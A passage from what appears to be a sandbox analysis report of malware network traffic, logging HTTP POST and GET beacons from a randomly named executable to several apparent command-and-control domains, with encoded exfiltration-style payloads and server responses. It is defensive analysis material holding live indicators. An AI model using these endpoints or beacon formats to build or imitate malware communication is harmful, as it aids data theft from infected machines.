                                                                                  Data Raw: 31 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 52 d9 6e 9c 30 14 7d cf 57 dc 3a aa e6 25 06 66 49 53 61 20 52 22 e5 b1 ff 70 31 0e 78 e2 85 da 66 02 fd fa 1a 33 5d 22 e5 ed de e3 63 9f 45 ae 86 a0 55 73 53 0d 02 bb e6 06 a0 d2 22 20 18 d4 a2 26 17 29 de 47 eb 02 01 6e 4d 10 26 d4 e4 5d 76 61 a8 3b 71 91 5c d0 b4 dc 49 23 83 44 45 3d 47 25 ea fd 9d 8e 80 9e f4 bf 1d e7 0f fb e4 85 4b 87 d8 46 be b1 04 f2 24 ec b9 93 63 00 ef 78 4d f2 71 6a 95 e4 f9 19 2f b8 e1 f9 f9 e7 24 dc 42 0f d9 21 3b 66 51 23 3b fb c7 4b 4d 00 c2 32 46 af 41 cc e1 3f 3a 69 aa 7c bb 18 b3 e5 5b b8 aa b5 dd 02 3e 2c 51 96 b4 c8 df 7a 67 27 d3 51 6e 95 75 25 dc 7e eb f0 9e 1f 19 89 37 a4 ee af c4 9d c6 79 0b 5a c2 a9 28 c6 99 a5 d4 25 ec 8b e2 2b 1b ad 8f e1 ad 29 01 5b 6f d5 14 04 73 b2 1f 42 09 05 0b 76 2c e1 18 49 4a bc 26 40 a3 eb 65 a4 16 80 53 b0 6c f7 31 aa d4 d8 8b fc 54 9c b2 d1 f4 24 56 52 7d a1 b4 1a f6 7f 7c 5c 65 37 0f 9f e8 6e af d3 4d 8c 1e 92 d5 2b 96 9c d0 ef 2b 92 c6 fb bf a6 d6 a9 93 7e 54 b8 94 d0 2a cb df d8 [TRUNCATED]
                                                                                  Data Ascii: 18dmRn0}W:%fISa R"p1xf3]"cEUsS" &)GnM&]va;q\I#DE=G%KF$cxMqj/$B!;fQ#;KM2FA?:i|[>,Qzg'Qnu%~7yZ(%+)[osBv,IJ&@eSl1T$VR}|\e7nM++~T*/*M'}yzx~xfkcp&r6Z&kka~1h0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.5500088.210.114.150803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:38.603723049 CET1649OUTPOST /rsvy/ HTTP/1.1
                                                                                  Host: www.llljjjiii.shop
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.llljjjiii.shop
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.llljjjiii.shop/rsvy/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 32 71 34 67 38 42 64 6b 36 7a 50 2f 75 41 43 44 4f 44 30 64 6f 6e 76 50 46 38 39 58 31 4d 7a 77 30 43 38 49 50 47 37 45 2b 63 66 42 4b 57 30 56 4e 58 4e 58 4f 67 4c 46 61 58 33 74 79 41 62 6a 65 4b 49 62 76 49 70 4c 5a 76 36 54 6b 45 6f 41 39 53 65 36 35 6a 71 2f 34 61 7a 59 62 65 61 55 43 6a 67 72 76 31 68 2f 31 38 6f 4c 5a 2f 74 78 30 63 43 59 6f 77 57 44 55 59 66 73 33 4e 4e 6c 7a 32 57 58 71 63 46 33 4a 6d 39 52 39 4b 61 2f 79 48 52 46 47 36 65 71 77 61 64 43 59 62 39 7a 6a 53 45 48 43 54 47 2f 65 2f 62 7a 6c 49 52 49 63 65 37 4b 4a 62 78 62 2f 39 61 66 42 71 66 32 76 39 49 46 79 39 7a 46 61 6d 52 48 39 68 63 70 38 58 53 6c 53 48 50 4a 58 76 38 65 4d 50 61 5a 2f 76 51 67 6f 72 54 62 70 66 77 78 6f 51 69 4d 6f 66 42 6f 4c 37 66 59 2f 38 48 7a 75 64 59 4b 73 77 4d 63 4b 50 55 57 31 6d 74 73 78 52 37 66 52 6a 72 53 73 6a 62 43 4e 49 54 31 42 72 33 76 51 31 71 4f 33 58 4a 62 45 2b 63 32 4e 39 48 44 48 45 61 38 4e 6e 39 6e 53 39 6a 6d 31 6b 30 4e [TRUNCATED]
                                                                                  Data Ascii: lH_L4=m+7KIMtJ4/BT2q4g8Bdk6zP/uACDOD0donvPF89X1Mzw0C8IPG7E+cfBKW0VNXNXOgLFaX3tyAbjeKIbvIpLZv6TkEoA9Se65jq/4azYbeaUCjgrv1h/18oLZ/tx0cCYowWDUYfs3NNlz2WXqcF3Jm9R9Ka/yHRFG6eqwadCYb9zjSEHCTG/e/bzlIRIce7KJbxb/9afBqf2v9IFy9zFamRH9hcp8XSlSHPJXv8eMPaZ/vQgorTbpfwxoQiMofBoL7fY/8HzudYKswMcKPUW1mtsxR7fRjrSsjbCNIT1Br3vQ1qO3XJbE+c2N9HDHEa8Nn9nS9jm1k0NezUwKblbHr4U9x1x1wqMjEj1cENApSGLFAPkM9q+dCu8TiLlk9/b+sK7+wNvT2ALQsQYxIhDQfq2I60pfEfYO3PI/w1Bb4AUjPGlY0Gkur3WpFND2iJvlEbAxbdnxDAuKe/H0mYMe2A2SPOwDXtmEeFYgqGccG6az6zxfH12wWkv1h9s+kqxLMwpCjiOYu88NZMkkk1U4e45m3J1e3XkAjo1YqM/36uH3rGlHkwHVRRocVf7wivKVsCRFfx3dMKthobe1zCu9RPA9LQ5fyQLm2N6FO2Kd162R7TuVbte/nLtQZwz4vkabTQ5gZK50TSNxa0z8LV+8m9xlPbXSajmtBT092FIyqKTSp08vf15lPk2NtJczG8ONt5FFYvUeSTZ+NqA3TVvDJWg7/BaUxA+jBpZ0bqXzGJZtEsE0FfUgkx5cO6GbizPyQGLexZiCGJk3AKl+Bdhu3fm68oGqPt6s6kvwjLVRUqE5dDELpbLIVgrRLEkcCbTJc1coFQCw/Xx+B7ktyDyNVEAKtsWBftDXutX+HZLNCBVt/XSN9XEVDfbW+no+llplMT4jJ+gR9fonGeTQKbk8AIiyp5fZo8bOVUY4ivN1oG4uITYG+vFHxWbvxkHsIzxWRCJYQXNhpWwZeSLrcegrdU/4KdHYx38/sa5lF5vES8B/Z [TRUNCATED]
                                                                                  Nov 27, 2024 01:27:40.074174881 CET925INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Set-Cookie: PHPSESSID=76b991s5d3ujepciom71mi0od6; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Pragma: no-cache
                                                                                  Set-Cookie: sessionid=76b991s5d3ujepciom71mi0od6; expires=Sat, 25-Nov-2034 00:27:39 GMT; Max-Age=315360000; path=/
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 31 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 52 d9 6e 9c 30 14 7d cf 57 dc 3a aa e6 25 06 66 49 53 61 20 52 22 e5 b1 ff 70 31 0e 78 e2 85 da 66 02 fd fa 1a 33 5d 22 e5 ed de e3 63 9f 45 ae 86 a0 55 73 53 0d 02 bb e6 06 a0 d2 22 20 18 d4 a2 26 17 29 de 47 eb 02 01 6e 4d 10 26 d4 e4 5d 76 61 a8 3b 71 91 5c d0 b4 dc 49 23 83 44 45 3d 47 25 ea fd 9d 8e 80 9e f4 bf 1d e7 0f fb e4 85 4b 87 d8 46 be b1 04 f2 24 ec b9 93 63 00 ef 78 4d f2 71 6a 95 e4 f9 19 2f b8 e1 f9 f9 e7 24 dc 42 0f d9 21 3b 66 51 23 3b fb c7 4b 4d 00 c2 32 46 af 41 cc e1 3f 3a 69 aa 7c bb 18 b3 e5 5b b8 aa b5 dd 02 3e 2c 51 96 b4 c8 df 7a 67 27 d3 51 6e 95 75 25 dc 7e eb f0 9e 1f 19 89 37 a4 ee af c4 9d c6 79 0b 5a c2 a9 28 c6 99 a5 d4 25 ec 8b e2 2b 1b ad 8f e1 ad 29 01 5b 6f d5 14 04 73 b2 1f 42 09 05 0b 76 2c e1 18 49 4a bc 26 40 a3 eb 65 a4 16 80 53 b0 6c f7 31 aa d4 d8 8b fc 54 9c b2 d1 f4 24 56 52 7d a1 b4 1a f6 7f 7c 5c 65 37 0f 9f e8 6e af d3 4d 8c 1e 92 d5 2b 96 9c d0 ef 2b 92 c6 fb bf a6 d6 a9 93 7e 54 b8 94 d0 2a cb df d8 [TRUNCATED]
                                                                                  Data Ascii: 18dmRn0}W:%fISa R"p1xf3]"cEUsS" &)GnM&]va;q\I#DE=G%KF$cxMqj/$B!;fQ#;KM2FA?:i|[>,Qzg'Qnu%~7yZ(%+)[osBv,IJ&@eSl1T$VR}|\e7nM++~T*/*M'}yzx~xfkcp&r6Z&kka~1h0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.5500098.210.114.150803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:41.280158043 CET360OUTGET /rsvy/?lH_L4=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.llljjjiii.shop
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:27:42.933449030 CET1120INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Set-Cookie: PHPSESSID=h5a20f8gkc0ekecppbif37gj22; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Pragma: no-cache
                                                                                  Set-Cookie: sessionid=h5a20f8gkc0ekecppbif37gj22; expires=Sat, 25-Nov-2034 00:27:42 GMT; Max-Age=315360000; path=/
                                                                                  Data Raw: 32 36 38 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 62 6c 69 63 2f 6a 61 76 61 73 63 72 69 70 74 2f 6a 71 75 65 72 79 2d 32 2e 32 2e 33 2e 6d 69 6e 2e 6a 73 3f 76 3d 22 20 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 64 61 35 63 33 3b 22 3e 0a 3c 69 6d 67 20 73 74 79 6c 65 3d 27 6d 61 78 2d 77 69 64 74 68 3a 20 34 30 30 70 78 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c [TRUNCATED]
                                                                                  Data Ascii: 268<html><head> <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" /> <script src="/public/javascript/jquery-2.2.3.min.js?v=" type="text/javascript"></script></head><body style="background-color: #6da5c3;"><img style='max-width: 400px;width: 100%;position: absolute;right: 0;top: 30%;left: 0;margin: 0 auto;' src="/public/image/404.png"/>...<h1 style='width: 400px;position: absolute;margin-left: -200px;margin-top: -80px;top: 50%;left: 50%;display: block;z-index: 2000;color:#FB7C7C;text-align: center'> 404 Not Found </h1>--></body></html>0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.5500103.33.130.190803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:48.744182110 CET618OUTPOST /huvt/ HTTP/1.1
                                                                                  Host: www.ampsamkok88.shop
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.ampsamkok88.shop
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.ampsamkok88.shop/huvt/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 36 65 38 69 65 39 53 76 70 54 2b 72 38 6a 6f 6b 73 32 31 35 50 36 31 57 62 67 4e 34 74 54 36 63 7a 63 31 6a 47 52 50 39 6d 61 35 4b 6e 4a 4b 36 64 38 44 51 53 78 51 43 64 57 52 39 68 77 66 5a 63 59 31 39 38 65 4e 75 5a 46 6a 52 52 4f 6c 73 35 62 4a 49 71 2f 41 73 77 49 71 46 6c 65 57 71 4c 34 35 63 56 2b 33 77 51 4e 4f 57 75 33 6b 69 31 63 73 76 6b 59 71 73 4c 53 47 54 64 4e 37 48 59 4f 56 56 58 50 78 72 6f 46 34 66 50 51 79 6c 31 37 46 4f 6e 75 2f 30 42 69 36 6c 4c 37 4e 62 58 46 59 31 43 31 59 66 77 50 43 41 6a 51 44 50 51 63 78 45 69 6a 48 65 5a 74 77 3d
                                                                                  Data Ascii: lH_L4=/z/07yxfDjX26e8ie9SvpT+r8joks215P61WbgN4tT6czc1jGRP9ma5KnJK6d8DQSxQCdWR9hwfZcY198eNuZFjRROls5bJIq/AswIqFleWqL45cV+3wQNOWu3ki1csvkYqsLSGTdN7HYOVVXPxroF4fPQyl17FOnu/0Bi6lL7NbXFY1C1YfwPCAjQDPQcxEijHeZtw=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.5500113.33.130.190803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:51.410229921 CET638OUTPOST /huvt/ HTTP/1.1
                                                                                  Host: www.ampsamkok88.shop
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.ampsamkok88.shop
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.ampsamkok88.shop/huvt/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 34 2b 4d 69 53 36 2b 76 34 44 2b 73 67 54 6f 6b 33 47 30 2b 50 36 70 57 62 6b 55 6e 74 6c 69 63 79 39 46 6a 48 54 72 39 32 4b 35 4b 79 35 4b 37 54 63 44 62 53 78 63 38 64 58 39 39 68 77 4c 5a 63 64 4a 39 37 76 4e 70 59 56 6a 54 64 75 6c 75 6b 4c 4a 49 71 2f 41 73 77 49 75 72 6c 65 4f 71 4c 4c 78 63 57 66 33 7a 54 4e 4f 56 70 33 6b 69 2f 38 73 72 6b 59 71 43 4c 54 62 38 64 4f 44 48 59 4f 6c 56 58 62 74 73 6a 46 34 6a 4c 51 7a 41 77 34 73 58 68 74 79 2f 42 56 66 48 59 74 35 35 62 54 70 66 59 58 51 33 6a 76 75 34 7a 44 4c 34 42 73 51 74 34 41 58 75 48 36 6b 5a 51 4c 63 76 7a 69 33 61 45 51 51 31 6e 35 6d 78 5a 50 68 46
                                                                                  Data Ascii: lH_L4=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlicy9FjHTr92K5Ky5K7TcDbSxc8dX99hwLZcdJ97vNpYVjTdulukLJIq/AswIurleOqLLxcWf3zTNOVp3ki/8srkYqCLTb8dODHYOlVXbtsjF4jLQzAw4sXhty/BVfHYt55bTpfYXQ3jvu4zDL4BsQt4AXuH6kZQLcvzi3aEQQ1n5mxZPhF


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.5500123.33.130.190803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:54.084717035 CET1655OUTPOST /huvt/ HTTP/1.1
                                                                                  Host: www.ampsamkok88.shop
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.ampsamkok88.shop
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.ampsamkok88.shop/huvt/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 34 2b 4d 69 53 36 2b 76 34 44 2b 73 67 54 6f 6b 33 47 30 2b 50 36 70 57 62 6b 55 6e 74 6c 71 63 79 50 39 6a 42 7a 58 39 31 4b 35 4b 7a 35 4b 2b 54 63 44 4b 53 78 45 34 64 58 42 48 68 79 7a 5a 54 59 46 39 2b 62 68 70 57 6c 6a 54 41 2b 6c 76 35 62 4a 6e 71 2f 77 57 77 49 2b 72 6c 65 4f 71 4c 4e 56 63 43 65 33 7a 56 4e 4f 57 75 33 6b 75 31 63 74 32 6b 65 44 2f 4c 54 66 57 63 2b 6a 48 57 4b 42 56 53 6f 46 73 2f 56 34 62 4f 51 7a 69 77 34 77 79 68 74 76 41 42 51 4c 74 59 71 4e 35 5a 58 77 2b 4b 30 30 47 79 76 32 6c 68 68 6a 68 41 4e 77 64 34 7a 4c 31 50 4b 49 39 61 5a 34 4d 35 30 61 5a 45 7a 56 70 6b 39 43 6d 62 72 38 45 33 35 69 5a 30 50 72 76 53 34 31 56 6c 31 59 48 49 6b 56 69 4e 77 52 4d 35 44 36 69 30 71 35 47 6c 31 47 38 78 69 7a 45 62 64 31 4f 38 33 55 70 42 47 38 35 4e 7a 64 55 64 5a 48 43 4f 36 64 58 77 52 35 71 36 4c 74 57 72 78 67 45 56 76 43 2b 67 37 36 4b 57 68 30 50 58 50 58 45 32 37 44 4f 51 74 47 62 2b 35 50 36 55 67 42 41 79 56 33 62 [TRUNCATED]
                                                                                  Data Ascii: lH_L4=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlqcyP9jBzX91K5Kz5K+TcDKSxE4dXBHhyzZTYF9+bhpWljTA+lv5bJnq/wWwI+rleOqLNVcCe3zVNOWu3ku1ct2keD/LTfWc+jHWKBVSoFs/V4bOQziw4wyhtvABQLtYqN5ZXw+K00Gyv2lhhjhANwd4zL1PKI9aZ4M50aZEzVpk9Cmbr8E35iZ0PrvS41Vl1YHIkViNwRM5D6i0q5Gl1G8xizEbd1O83UpBG85NzdUdZHCO6dXwR5q6LtWrxgEVvC+g76KWh0PXPXE27DOQtGb+5P6UgBAyV3bnVnuxxb7UKZbHct2lBeIqnfTGhBB2TMFJ/8GAwS3vAwkQCtFxJOs54cu66bGjyC8TyLkP4ttWPJ9FlhlJ/5RK8krKz8NmRY2zE3RXpN94Nzs6lPeLCwNYjTY2JAqSbFNtIr5QxY8sQy9RPpy74LQ3rmBP9V60W2T/evRnxiQ8V9hBM/roR/X5rsHr930awgAeLCXZraBwBecyBTnOfNEPsQJtYoVwrSNzMlfRuyRkthhmYRb0sXyvKUcHeJ4UA4TZwDKotLfl+3svBkpg1lEWEskeAJMxDCm0YX3ibdERYql93DHCq7iiVhcVgiss3yxZx5hToERUXtKGtE6hY1AEpjgCpNrd3iaIBxlVU05HmsevEQsVjvjTSToUX8I/XiEIv1T1h1mkaLLd/H0nYjH1HYatH00VlNGdRE0qpx7oZ4UondZggqYkK4ylhZ/k+nIb+kMUPlfMrieAknYduq1ZPEzFl9siHbu3fr4Zja7KWhMm7cFwTkqLLyk9pQMldqbQwR9VcvzlzxIM3fLiZ4M1d/MhqzD7e/R+grBOvwUOBwWttjhZA4RHZRmpfjv/s/73yC183tf7mkQGI1STSzK80sXPcLZ/2x71uRTeTZQayvBpcVwGQvIXJIM7C1TewWLxrKQwVZQFx0NjwHJmSw3D/VWAITGJDbSZ9 [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.5500133.33.130.190803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:56.759577990 CET362OUTGET /huvt/?005PE=aNcLxhD894SLKl&lH_L4=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ== HTTP/1.1
                                                                                  Host: www.ampsamkok88.shop
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:27:57.850389957 CET414INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 27 Nov 2024 00:27:57 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 274
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 30 30 35 50 45 3d 61 4e 63 4c 78 68 44 38 39 34 53 4c 4b 6c 26 6c 48 5f 4c 34 3d 79 78 58 55 34 48 70 41 62 68 61 66 2b 4f 6b 6f 59 75 69 68 39 69 2f 67 39 51 45 77 37 48 4e 59 59 61 39 56 62 6b 5a 38 69 30 65 44 37 66 46 67 50 79 65 38 67 71 64 4b 35 36 36 57 47 50 2f 58 63 53 38 43 4d 6b 78 6f 6d 79 53 46 54 74 64 44 34 75 56 50 64 6d 58 4a 55 35 4e 72 76 37 74 50 6a 38 6f 6f 79 34 79 63 75 50 71 66 4e 61 4a 41 43 50 4c 6f 45 4e 57 31 6b 46 4d 79 37 2f 70 7a 6e 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?005PE=aNcLxhD894SLKl&lH_L4=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ=="}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.550014209.74.77.109803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:03.410196066 CET615OUTPOST /6gtt/ HTTP/1.1
                                                                                  Host: www.gogawithme.live
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.gogawithme.live
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.gogawithme.live/6gtt/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 66 45 6f 55 73 33 78 62 74 43 48 52 50 62 42 64 6a 61 53 4a 71 34 69 54 73 52 72 7a 50 2f 66 6b 4c 5a 75 73 58 75 6e 2b 56 6d 72 76 32 4c 58 6f 66 47 79 46 59 2b 65 69 73 53 4a 39 37 65 5a 51 32 61 75 6f 55 62 79 63 6c 4f 36 41 46 75 4d 6a 38 6f 72 76 64 39 44 56 59 69 33 64 76 64 56 35 45 6e 6a 76 2f 6e 72 6d 4b 58 61 64 41 50 4e 4a 31 6b 34 4c 37 36 47 4a 30 6d 52 4e 52 42 30 39 66 62 54 53 48 4e 55 2f 67 44 64 57 68 76 58 79 6f 41 31 45 5a 71 4b 6a 38 56 36 42 6f 73 44 55 57 68 66 6a 35 31 55 48 54 54 57 73 39 59 66 35 51 6a 74 32 32 32 63 6f 68 56 47 77 31 57 47 61 36 62 7a 6b 53 57 30 3d
                                                                                  Data Ascii: lH_L4=fEoUs3xbtCHRPbBdjaSJq4iTsRrzP/fkLZusXun+Vmrv2LXofGyFY+eisSJ97eZQ2auoUbyclO6AFuMj8orvd9DVYi3dvdV5Enjv/nrmKXadAPNJ1k4L76GJ0mRNRB09fbTSHNU/gDdWhvXyoA1EZqKj8V6BosDUWhfj51UHTTWs9Yf5Qjt222cohVGw1WGa6bzkSW0=
                                                                                  Nov 27, 2024 01:28:04.666182995 CET533INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 27 Nov 2024 00:28:04 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
